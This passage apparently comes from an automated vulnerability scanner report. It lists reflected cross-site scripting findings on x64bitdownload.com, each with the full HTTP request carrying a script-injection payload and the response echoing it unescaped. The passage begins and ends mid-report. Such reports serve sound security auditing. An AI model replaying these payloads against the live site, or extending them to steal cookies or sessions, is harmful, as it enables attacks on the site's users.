The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d45f"><script>alert(1)</script>fb73e15ccb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-ssl-downloads.html?7d45f"><script>alert(1)</script>fb73e15ccb4=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:54:28 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:04:36 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22ssl%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22ssl%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87867

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-ssl-downloads.html?7d45f"><script>alert(1)</script>fb73e15ccb4=1" />
...[SNIP]...

1.122. http://www.x64bitdownload.com/64-bit-synchronization-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-synchronization-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42925"><script>alert(1)</script>83516ad106d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-synchronization-downloads.html42925"><script>alert(1)</script>83516ad106d HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:00:24 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:10:32 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A15%3A%22synchronization%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A15%3A%22synchronization%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90163

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-synchronization-downloads.html42925"><script>alert(1)</script>83516ad106d" />
...[SNIP]...

1.123. http://www.x64bitdownload.com/64-bit-synchronization-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-synchronization-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa26d"><script>alert(1)</script>59dfdd435a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-synchronization-downloads.html?aa26d"><script>alert(1)</script>59dfdd435a1=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:58:13 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:08:17 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A15%3A%22synchronization%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A15%3A%22synchronization%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90166

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-synchronization-downloads.html?aa26d"><script>alert(1)</script>59dfdd435a1=1" />
...[SNIP]...

1.124. http://www.x64bitdownload.com/64-bit-synchronize-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-synchronize-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72d90"><script>alert(1)</script>34e92339c0f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-synchronize-downloads.html?72d90"><script>alert(1)</script>34e92339c0f=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:57:50 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:08:04 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A11%3A%22synchronize%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A11%3A%22synchronize%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91312

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-synchronize-downloads.html?72d90"><script>alert(1)</script>34e92339c0f=1" />
...[SNIP]...

1.125. http://www.x64bitdownload.com/64-bit-troll-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-troll-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2d4c"><script>alert(1)</script>b3d1287dd66 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-troll-downloads.html?b2d4c"><script>alert(1)</script>b3d1287dd66=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:53 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:10:01 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22troll%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22troll%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28801

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-troll-downloads.html?b2d4c"><script>alert(1)</script>b3d1287dd66=1" />
...[SNIP]...

1.126. http://www.x64bitdownload.com/64-bit-use-next-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-use-next-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5baa0"><script>alert(1)</script>4b3b5d06ac5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-use-next-downloads.html5baa0"><script>alert(1)</script>4b3b5d06ac5 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:53:08 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:03:32 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22use-next%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22use+next%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60784

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-use-next-downloads.html5baa0"><script>alert(1)</script>4b3b5d06ac5" />
...[SNIP]...

1.127. http://www.x64bitdownload.com/64-bit-use-next-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-use-next-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f665d"><script>alert(1)</script>b0fbaf8a5f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-use-next-downloads.html?f665d"><script>alert(1)</script>b0fbaf8a5f3=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:49:20 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:59:21 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22use-next%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22use+next%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-use-next-downloads.html?f665d"><script>alert(1)</script>b0fbaf8a5f3=1" />
...[SNIP]...

1.128. http://www.x64bitdownload.com/64-bit-usenet-c-44-newsgroup-clients-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-usenet-c-44-newsgroup-clients-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7902c"><script>alert(1)</script>6aa1bdd3d27 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-usenet-c-44-newsgroup-clients-downloads.html7902c"><script>alert(1)</script>6aa1bdd3d27 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:37:55 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:48:05 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22usenet%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22usenet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-usenet-c-44-newsgroup-clients-downloads.html7902c"><script>alert(1)</script>6aa1bdd3d27" />
...[SNIP]...

1.129. http://www.x64bitdownload.com/64-bit-usenet-c-44-newsgroup-clients-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-usenet-c-44-newsgroup-clients-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2042"><script>alert(1)</script>dcfd4e32e26 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-usenet-c-44-newsgroup-clients-downloads.html?d2042"><script>alert(1)</script>dcfd4e32e26=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:25 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:40 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22usenet%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22usenet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-usenet-c-44-newsgroup-clients-downloads.html?d2042"><script>alert(1)</script>dcfd4e32e26=1" />
...[SNIP]...

1.130. http://www.x64bitdownload.com/64-bit-usenet-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-usenet-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9c53"><script>alert(1)</script>61783017a7a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-usenet-downloads.htmlb9c53"><script>alert(1)</script>61783017a7a HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:49:15 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:59:23 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22usenet%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22usenet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79250

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-usenet-downloads.htmlb9c53"><script>alert(1)</script>61783017a7a" />
...[SNIP]...

1.131. http://www.x64bitdownload.com/64-bit-usenet-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-usenet-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7053"><script>alert(1)</script>b56ce311832 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-usenet-downloads.html?c7053"><script>alert(1)</script>b56ce311832=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:47:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:57:33 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22usenet%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22usenet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-usenet-downloads.html?c7053"><script>alert(1)</script>b56ce311832=1" />
...[SNIP]...

1.132. http://www.x64bitdownload.com/64-bit-usenet-search-engine-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-usenet-search-engine-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88aaf"><script>alert(1)</script>189e1a3160f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-usenet-search-engine-downloads.html88aaf"><script>alert(1)</script>189e1a3160f HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:40:17 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:50:23 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A20%3A%22usenet-search-engine%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A20%3A%22usenet+search+engine%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38622

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-usenet-search-engine-downloads.html88aaf"><script>alert(1)</script>189e1a3160f" />
...[SNIP]...

1.133. http://www.x64bitdownload.com/64-bit-usenet-search-engine-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-usenet-search-engine-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6caf6"><script>alert(1)</script>8b75e1c033 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-usenet-search-engine-downloads.html?6caf6"><script>alert(1)</script>8b75e1c033=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:36:34 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:46:45 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A20%3A%22usenet-search-engine%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A20%3A%22usenet+search+engine%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38624

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-usenet-search-engine-downloads.html?6caf6"><script>alert(1)</script>8b75e1c033=1" />
...[SNIP]...

1.134. http://www.x64bitdownload.com/64-bit-usenext-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-usenext-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a316"><script>alert(1)</script>d8cd7fa8591 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-usenext-downloads.html9a316"><script>alert(1)</script>d8cd7fa8591 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:53:02 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:03:44 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22usenext%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22usenext%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28788

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-usenext-downloads.html9a316"><script>alert(1)</script>d8cd7fa8591" />
...[SNIP]...

1.135. http://www.x64bitdownload.com/64-bit-usenext-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-usenext-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 987b5"><script>alert(1)</script>7e91aeed80a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-usenext-downloads.html?987b5"><script>alert(1)</script>7e91aeed80a=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:48:46 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:58:56 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22usenext%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22usenext%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28791

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-usenext-downloads.html?987b5"><script>alert(1)</script>7e91aeed80a=1" />
...[SNIP]...

1.136. http://www.x64bitdownload.com/64-bit-video-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-video-downloads.html

Issue detail

